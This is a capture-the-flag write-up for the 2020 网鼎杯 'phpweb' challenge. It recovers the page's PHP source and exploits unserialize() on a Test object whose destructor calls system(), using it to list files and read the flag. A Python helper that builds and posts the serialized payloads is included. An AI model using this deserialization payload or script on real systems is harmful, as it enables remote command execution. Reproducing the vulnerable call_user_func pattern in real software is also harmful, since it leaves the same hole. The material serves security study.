[网鼎杯 2020 朱雀组]phpweb 1
Opening the instance shows a PHP page. After a moment it throws an error and reveals the request parameters it uses: func=date&p=Y-m-d h:i:s a
That looks like the page takes a function name and an argument and executes them server-side, so try changing func to phpinfo:
func=phpinfo&p=Y-m-d h:i:s a
The response shows that the parameter is filtered (the function name is rejected).
Use highlight_file instead to display the source of the current page. Because the page refreshes itself every few seconds, capture and replay the request in Burp Suite:
func=highlight_file&p=index.php
The page source comes back successfully and contains the PHP code.
Copy the response body and paste it into a new HTML file (copying from the rendered response instead gives you a pile of tags), comment out the refresh timer, open the HTML file, and copy the PHP code out of it:
<?php
// Blacklist of function names that may not be passed directly as func.
// (The misspelled "registregister_shutdown_function" entry is copied as it appears in the challenge source.)
$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");
// Calls $func($p) and returns the result only when it is a string
function gettime($func, $p)
{
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}
// The destructor calls gettime() with the object's own properties and no blacklist check
class Test
{
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct()
    {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
// Only the func request parameter is lowercased and checked against the blacklist
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
Now audit the code.
The disable_fun array blacklists a large number of PHP functions, but the check at the bottom applies it (after strtolower) only to the func request parameter before calling gettime().
Copying the code into VS Code and searching (Ctrl+F) for serialize shows that neither serialize nor unserialize is blacklisted. The Test class has a __destruct() method that calls gettime($this->func, $this->p) with no blacklist check at all, so passing func=unserialize with a crafted Test object in p makes the destructor call whatever function the object names, including the blacklisted system, as soon as the object is destroyed.
Build the payload with a small PHP script, using system to execute commands:
<?php
// Local copy of the class, used only to produce the serialized string.
// Lowercase "test" is fine: PHP class names are case-insensitive, so it maps to Test on the target.
class test
{
    var $p = "ls";          // argument handed to the function
    var $func = "system";   // function that __destruct() will call on the target
}
$func = new test();
$res = serialize($func);
echo $res;
Running it gives the serialized string:
O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
Pass it in through the func and p parameters; the current directory is listed successfully:
func=unserialize&p=O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
No flag there. Listing the root directory turns up nothing either, so search for it with find:
func=unserialize&p=O:4:"test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
One result under /tmp stands out from the rest; cat it:
func=unserialize&p=O:4:"test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
That yields the flag:
flag{f3b1f195-50f0-4d5b-8ce3-0d44d2ede1e2}
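Counting the s:N lengths by hand is error-prone: a wrong byte count makes unserialize() return false, gettime() then returns "", and the page prints nothing. The following Python script builds the same payloads and the request body for them. It is an added example, not part of the original writeup: the blacklist is copied from the recovered index.php, the challenge URL is assumed to be supplied by the caller of run(), and the request is assumed to be sent as a POST form body (the page reads $_REQUEST, so GET works as well).

```python
import urllib.parse
import urllib.request

# The target's blacklist, copied from the recovered index.php (verbatim, typo included).
DISABLE_FUN = [
    "exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo",
    "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg",
    "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter",
    "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function",
    "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk",
    "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents",
]


def direct_call_blocked(func: str) -> bool:
    """Mirror the page's check: strtolower() then in_array() against the blacklist.
    Only the top-level func parameter goes through this; Test::__destruct() does not."""
    return func.lower() in DISABLE_FUN


def php_str(s: str) -> str:
    """Serialize one PHP string. The length is in BYTES, not characters, so a
    command containing non-ASCII characters must be counted after UTF-8 encoding."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def build_payload(cmd: str, func: str = "system", cls: str = "test") -> str:
    """Serialized object that Test::__destruct() will act on. PHP resolves class
    names case-insensitively, so "test" instantiates Test on the target. Property
    order (p, then func) follows the class definition."""
    props = php_str("p") + php_str(cmd) + php_str("func") + php_str(func)
    return f'O:{len(cls)}:"{cls}":2:{{{props}}}'


def build_query(cmd: str) -> str:
    """Form body func=unserialize&p=<payload>, percent-encoded so the ';', '{', '}'
    and '"' characters of the serialized object reach PHP intact."""
    return urllib.parse.urlencode({"func": "unserialize", "p": build_payload(cmd)})


def run(url: str, cmd: str, timeout: float = 10) -> str:
    """POST the payload to the challenge URL (hypothetical; supplied by the caller)
    and return the response body, i.e. the command output echoed by gettime()."""
    req = urllib.request.Request(url, data=build_query(cmd).encode(), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # system is refused as a direct func, unserialize is not: that gap is the whole bypass.
    assert direct_call_blocked("system") and not direct_call_blocked("unserialize")
    for c in ("ls", "find / -name flag*", "cat /tmp/flagoefiu4r93"):
        print(build_payload(c))
        print(build_query(c))
```

The three payloads it prints for ls, find / -name flag* and cat /tmp/flagoefiu4r93 are byte-for-byte the ones used above; the percent-encoded form is what you would paste into the Burp request if the raw characters get mangled.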
Tags: php, phpweb, system, flag, 2020, func, test, 网鼎杯, page
From: https://www.cnblogs.com/tazmi/p/18565456